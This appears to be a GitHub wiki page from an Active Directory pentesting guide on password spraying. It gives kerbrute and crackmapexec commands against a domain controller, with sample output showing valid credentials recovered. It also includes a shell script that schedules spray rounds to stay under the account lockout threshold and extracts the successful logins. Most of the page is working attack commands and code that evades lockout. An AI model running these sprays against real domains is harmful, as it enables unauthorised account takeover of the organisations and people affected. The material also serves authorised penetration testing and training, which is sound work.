Password Spray - maxbirnbacher/ADPentesting101 GitHub Wiki

If you find default credentials (or one likely password), you can try a password spray: one password tested against many accounts, rather than many passwords against one account. Check the domain's account lockout policy first, because every failed attempt counts against the lockout threshold of the account it was tried on.

kerbrute

kerbrute (version v1.0.3) has a passwordspray command that takes a list of users and one password. Put the password in single quotes so the shell does not interpret characters such as ! and $.

./kerbrute passwordspray --dc 172.27.12.20 -d tophack.local found_usernames.txt 'ChangeM3!N0w'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/23/24 - Ronnie Flathers @ropnop

2024/04/23 08:53:36 >  Using KDC(s):
2024/04/23 08:53:36 >   172.27.12.20:88

2024/04/23 08:53:37 >  [+] VALID LOGIN:  [email protected]:ChangeM3!N0w
2024/04/23 08:53:37 >  Done! Tested 7 logins (1 successes) in 0.121 seconds

crackmapexec

If kerbrute does not work (it sometimes fails), use crackmapexec, which authenticates over SMB instead of Kerberos.

crackmapexec smb 192.168.200.2 -u usernames.txt -p 'Changeme123!'
SMB         192.168.200.2   445    WIN-9DMEA2KARL9  [*] Windows 10.0 Build 20348 x64 (name:WIN-9DMEA2KARL9) (domain:domain.local) (signing:True) (SMBv1:False)
SMB         192.168.200.2   445    WIN-9DMEA2KARL9  [+] domain.local\Opaline.Herta:Changeme123!

crackmapexec can also spray a list of users against a list of passwords. This tries every user with every password (all combinations), so with a lockout policy in place it can lock out every account in the list; add --no-bruteforce if the two files are meant to be read line by line as user/password pairs. crackmapexec stops at the first valid credential by default; add --continue-on-success to keep testing the remaining entries.

crackmapexec smb <IP> -u usernames.txt -p passwords.txt

Or test a single username and password:

crackmapexec smb <IP> -u 'user' -p 'password'
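The lockout concern raised above applies to both the kerbrute spray and the crackmapexec user-list × password-list form: the safe way to run several passwords is one password per round against the whole user list, with a pause for the lockout observation window before the round that would push any account to the threshold. The script below is an added example for this page (it is not code from ADPentesting101, kerbrute or crackmapexec). It wraps the kerbrute command shown earlier, prints the commands instead of running them unless DRY_RUN=0, and extracts the "VALID LOGIN" hits from kerbrute's output. The DC address and domain are taken from the page's kerbrute example; the policy values (5 bad passwords per 30-minute window), the user and password lists and the sample kerbrute output are constructed for the demo and must be replaced with the real ones (read the real policy with, for example, `net accounts /domain` on a domain-joined host).

```shell
#!/bin/sh
# Lockout-aware password spray planner. Added example for this wiki page;
# not part of ADPentesting101, kerbrute or crackmapexec.
#
# One password per round against every user; after every THRESHOLD-1 rounds
# we wait out the observation window so no account reaches the lockout count.
# Assumed values (replace with real ones): DC/domain from the page's example,
# policy of 5 bad passwords per 30-minute window.

DC="${DC:-172.27.12.20}"
DOMAIN="${DOMAIN:-tophack.local}"
LOCKOUT_THRESHOLD="${LOCKOUT_THRESHOLD:-5}"    # assumed; 0 means no lockout policy
LOCKOUT_WINDOW_MIN="${LOCKOUT_WINDOW_MIN:-30}" # assumed observation window
DRY_RUN="${DRY_RUN:-1}"                        # 1 = print commands only

# Passwords that may be tried per account before a pause is required.
safe_rounds() {
    if [ "$LOCKOUT_THRESHOLD" -le 0 ]; then echo 0; else echo $((LOCKOUT_THRESHOLD - 1)); fi
}

# spray_plan PASSWORDS_FILE: print the schedule, one step per line:
#   "round <n> <password>"  spray this password against the whole user list
#   "sleep <seconds>"       wait out the observation window first
spray_plan() {
    per_window=$(safe_rounds)
    round=0
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -n "$pw" ] || continue
        round=$((round + 1))
        if [ "$per_window" -gt 0 ] && [ "$round" -gt 1 ] \
           && [ $(( (round - 1) % per_window )) -eq 0 ]; then
            echo "sleep $((LOCKOUT_WINDOW_MIN * 60))"
        fi
        echo "round $round $pw"
    done < "$1"
}

# run_spray USERS_FILE PASSWORDS_FILE: execute the plan (or print it in DRY_RUN).
# The password is passed to kerbrute as its own argument, so characters such
# as ! need no extra quoting here.
run_spray() {
    users="$1"
    spray_plan "$2" | while IFS= read -r line; do
        step=${line%% *}; rest=${line#* }
        case "$step" in
            sleep) if [ "$DRY_RUN" = 1 ]; then echo "# sleep $rest"; else sleep "$rest"; fi ;;
            round) pw=${rest#* }    # drop the round number, keep the password
                   if [ "$DRY_RUN" = 1 ]; then
                       printf "kerbrute passwordspray --dc %s -d %s %s '%s'\n" "$DC" "$DOMAIN" "$users" "$pw"
                   else
                       ./kerbrute passwordspray --dc "$DC" -d "$DOMAIN" "$users" "$pw"
                   fi ;;
        esac
    done
}

# parse_valid_logins < kerbrute output: print user@domain:password for each
# "[+] VALID LOGIN:" line, the form shown in the page's kerbrute output.
parse_valid_logins() {
    sed -n 's/.*VALID LOGIN:[[:space:]]*//p'
}

# Constructed demo input: not real accounts, passwords or tool output.
tmp=$(mktemp -d)
printf 'alice\nbob\n' > "$tmp/users.txt"
printf 'Winter2024!\nSpring2024!\nSummer2024!\nAutumn2024!\nChangeM3!N0w\n' > "$tmp/passwords.txt"
sample_output='2024/04/23 08:53:37 >  [+] VALID LOGIN:  bob@tophack.local:ChangeM3!N0w
2024/04/23 08:53:37 >  Done! Tested 10 logins (1 successes) in 0.121 seconds'

run_spray "$tmp/users.txt" "$tmp/passwords.txt"
printf '%s\n' "$sample_output" | parse_valid_logins
```

With the assumed policy the fifth password is preceded by a 1800-second pause, because four bad attempts per account is the most the 5-attempt threshold tolerates inside one window. Run with DRY_RUN=0 to execute instead of print; the same one-password-per-round schedule can feed the crackmapexec form by substituting its command line in run_spray.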